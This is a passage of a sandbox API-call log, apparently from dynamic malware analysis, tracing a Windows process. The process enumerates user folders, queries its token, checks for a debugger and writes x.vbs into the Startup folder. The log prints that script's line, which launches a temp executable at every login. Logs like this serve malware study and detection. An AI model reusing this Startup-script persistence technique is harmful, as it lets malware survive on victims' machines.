"C:\\Users\\pacop" }, { "name": "FirstCreateTimeLow", "value": "0xe2aae62f" }, { "name": "FirstCreateTimeHigh", "value": "0x01db7d47" } ], "repeated": 0, "id": 52 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005802b6", "parentcaller": "0x00578dc1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 53 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058029d", "parentcaller": "0x00578dc1", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x02ef6f68", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData" }, { "name": "FirstCreateTimeLow", "value": "0xe2aae62f" }, { "name": "FirstCreateTimeHigh", "value": "0x01db7d47" } ], "repeated": 0, "id": 54 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005802b6", "parentcaller": "0x00578dc1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 55 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058029d", "parentcaller": "0x00578dc1", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x02ef6ce8", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local" }, { "name": "FirstCreateTimeLow", "value": "0xe2aae62f" }, { "name": "FirstCreateTimeHigh", "value": "0x01db7d47" } ], "repeated": 0, "id": 56 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005802b6", "parentcaller": "0x00578dc1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 57 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0058029d", "parentcaller": "0x00578dc1", "category": "filesystem", "api": "FindFirstFileExW", "status": true, "return": "0x02ef6b68", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp" }, { "name": "FirstCreateTimeLow", "value": "0xe2aae62f" }, { "name": "FirstCreateTimeHigh", "value": "0x01db7d47" } ], "repeated": 0, "id": 58 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005802b6", "parentcaller": "0x00578dc1", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 59 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578de6", "parentcaller": "0x005801ce", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Local\\Temp" } ], "repeated": 0, "id": 60 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057aa00", "parentcaller": "0x005801ce", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f06000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 61 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x0057dcee", "parentcaller": "0x00578922", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f07000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 62 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x005789b1", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00$\\x82\\x1dw\\xd0\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\xdc\\xf9\\xcf\\x02\\xd8\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 63 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "10" }, { "name": "TokenInformation", "value": ">s\\x9b\\x02\\x00\\x00\\x00\\x00U\\xef\n\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\x7f\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x94\\x0f\\x00\\x00\\x0e\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\xbbz\\x99\\x02\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 64 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x10\\x96\\xef\\x02\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xad2\\xf3\\xac\\xb0\\xfaz\\xcb\\xa6\\xb55\\xb9\\xe9\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 65 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "__notification__", "api": "sysenter", "status": true, "return": "0x00000000", "arguments": [ { "name": "ThreadIdentifier", "value": "10680" }, { "name": "Module", "value": "KERNELBASE.dll" }, { "name": "Return Address", "value": "0x76518e0c" } ], "repeated": 0, "id": 66 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000228" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\CustomLocale" } ], "repeated": 0, "id": 67 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000228" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\CustomLocale\\es-ES" } ], "repeated": 0, "id": 68 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000228" } ], "repeated": 0, "id": 69 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000228" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Nls\\ExtendedLocale" } ], "repeated": 0, "id": 70 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000228" }, { "name": "ValueName", "value": "es-ES" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Nls\\ExtendedLocale\\es-ES" } ], "repeated": 0, "id": 71 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000228" } ], "repeated": 0, "id": 72 }, { "timestamp": "2025-03-02 21:32:29,017", "thread_id": "10680", "caller": "0x00578797", "parentcaller": "0x005789c7", "category": "system", "api": "GetUserDefaultLCID", "status": true, "return": "0x00000c0a", "arguments": [ { "name": "SystemDefaultLangID", "value": "0x00000c0a" }, { "name": "LanguageName", "value": "Spanish (Spain)" } ], "repeated": 1, "id": 73 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578776", "parentcaller": "0x005789c7", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "DesiredAccess", "value": "0x00000009", "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Session Manager" } ], "repeated": 0, "id": 74 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578776", "parentcaller": "0x005789c7", "category": "registry", "api": "NtQueryValueKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000240" }, { "name": "ValueName", "value": "ResourcePolicies" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Session Manager\\ResourcePolicies" } ], "repeated": 0, "id": 75 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578776", "parentcaller": "0x005789c7", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 76 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578776", "parentcaller": "0x005789c7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02ed0000" }, { "name": "RegionSize", "value": "0x00008000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 77 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578776", "parentcaller": "0x005789c7", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02ed0000" }, { "name": "RegionSize", "value": "0x00001000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 78 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578776", "parentcaller": "0x005789c7", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06524000" }, { "name": "RegionSize", "value": "0x0001c000" }, { "name": "FreeType", "value": "0x00004000" } ], "repeated": 0, "id": 79 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x005789ef", "parentcaller": "0x00580a55", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x90\\xf7\\xcf\\x02d\\xf8\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x02\\x00\\x00N\\x01\\x00\\x00\\xf0\n\\xee\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 80 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578ac6", "parentcaller": "0x00580a55", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 81 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578ad7", "parentcaller": "0x00580a55", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75879730" } ], "repeated": 0, "id": 82 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578aed", "parentcaller": "0x00580a55", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "IsDebuggerPresent" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882370" } ], "repeated": 0, "id": 83 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578afe", "parentcaller": "0x00580a55", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetConsoleInputExeNameW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x765a2e30" } ], "repeated": 0, "id": 84 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00578b1e", "parentcaller": "0x00580a55", "category": "process", "api": "NtFreeVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x04943000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "FreeType", "value": "0x00004000" } ], "repeated": 0, "id": 85 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06524000" }, { "name": "RegionSize", "value": "0x0001c000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 86 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057ddf6", "parentcaller": "0x0057a056", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00@\\xf6\\xcf\\x02\\xa0\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 87 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057a1b5", "parentcaller": "0x0057e57b", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x0000009c" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x00000240" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 88 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057a1a1", "parentcaller": "0x0057e57b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000009c" } ], "repeated": 0, "id": 89 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00580605", "parentcaller": "0x0057a0a5", "category": "filesystem", "api": "NtCreateFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000009c" }, { "name": "DesiredAccess", "value": "0x40100080", "pretty_value": "GENERIC_WRITE|FILE_READ_ATTRIBUTES|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" }, { "name": "CreateDisposition", "value": "5", "pretty_value": "FILE_OVERWRITE_IF" }, { "name": "ShareAccess", "value": "1", "pretty_value": "FILE_SHARE_READ" }, { "name": "FileAttributes", "value": "0x00000080", "pretty_value": "FILE_ATTRIBUTE_NORMAL" }, { "name": "ExistedBefore", "value": "no" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 90 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057adbc", "parentcaller": "0x0057e4f6", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x02\\x00\\x00\\x02\\x10\\xf4\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\xff\\x07\\x00\\x00\\x18\\xf4\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x02\\x00\\x00\\x01\\x00\\x00\\x00\\xf0\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 91 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0058744a", "parentcaller": "0x00586e48", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x06541000" }, { "name": "RegionSize", "value": "0x00010000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 92 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00579ba9", "parentcaller": "0x005799bd", "category": "filesystem", "api": "NtWriteFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x0000009c" }, { "name": "HandleName", "value": "C:\\Users\\pacop\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x.vbs" }, { "name": "Buffer", "value": "on error resume next:CreateObject(\"WScript.Shell\").Run \"C:\\Users\\pacop\\AppData\\Local\\Temp\\f1e62c0e7345fc825586.exe\",1: \r\n" }, { "name": "Length", "value": "121" } ], "repeated": 0, "id": 93 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057a1f0", "parentcaller": "0x0057a14c", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000009c" } ], "repeated": 0, "id": 94 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057a1f0", "parentcaller": "0x0057a14c", "category": "system", "api": "NtDuplicateObject", "status": true, "return": "0x00000000", "arguments": [ { "name": "SourceProcessHandle", "value": "0xffffffff" }, { "name": "SourceHandle", "value": "0x00000240" }, { "name": "TargetProcessHandle", "value": "0xffffffff" }, { "name": "TargetHandle", "value": "0x0000009c" }, { "name": "Options", "value": "0x00000002" } ], "repeated": 0, "id": 95 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057a1a1", "parentcaller": "0x00580b09", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000240" } ], "repeated": 0, "id": 96 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057e328", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\xbd\\xe6\\xdf^8\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\"\\x00\\x00\\x00@\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 97 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057e33f", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x9c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x01\\x00\\x00\\x008\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 98 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057e36e", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x98\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x01\\x00\\x00\\x008\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 99 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00580aa9", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xba\\xe3W\\x00H\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\xff\\xff\\xff\\xffP\\xf9\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 100 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x0057e2c8", "parentcaller": "0x00586a0a", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000094" }, { "name": "IoControlCode", "value": "0x00500016" }, { "name": "InputBuffer", "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\xfc\\xf5\\xcf\\x02\\xc8\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\xf6\\xcf\\x02\\x00\\x00\\x00\\x00" }, { "name": "OutputBuffer", "value": "" } ], "repeated": 0, "id": 101 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "LdrGetDllHandle", "status": false, "return": "0xffffffffc0000135", "pretty_return": "DLL_NOT_FOUND", "arguments": [ { "name": "FileName", "value": "mscoree.dll" }, { "name": "ModuleHandle", "value": "0x04941b98" } ], "repeated": 0, "id": 102 }, { "timestamp": "2025-03-02 21:32:29,032", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "process", "api": "NtTerminateProcess", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0x00000000" }, { "name": "ExitCode", "value": "0x00000000" } ], "repeated": 0, "id": 103 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001e4" } ], "repeated": 0, "id": 104 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001e8" } ], "repeated": 0, "id": 105 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001e0" } ], "repeated": 0, "id": 106 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001d0" } ], "repeated": 0, "id": 107 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001c8" } ], "repeated": 0, "id": 108 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001b0" } ], "repeated": 0, "id": 109 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001b4" } ], "repeated": 0, "id": 110 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001b8" } ], "repeated": 0, "id": 111 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000001bc" } ], "repeated": 0, "id": 112 }, { "timestamp": "2025-03-02 21:32:29,048", "thread_id": "10680", "caller": "0x00580ae0", "parentcaller": "0x00586a0a", "category": "system", "api": 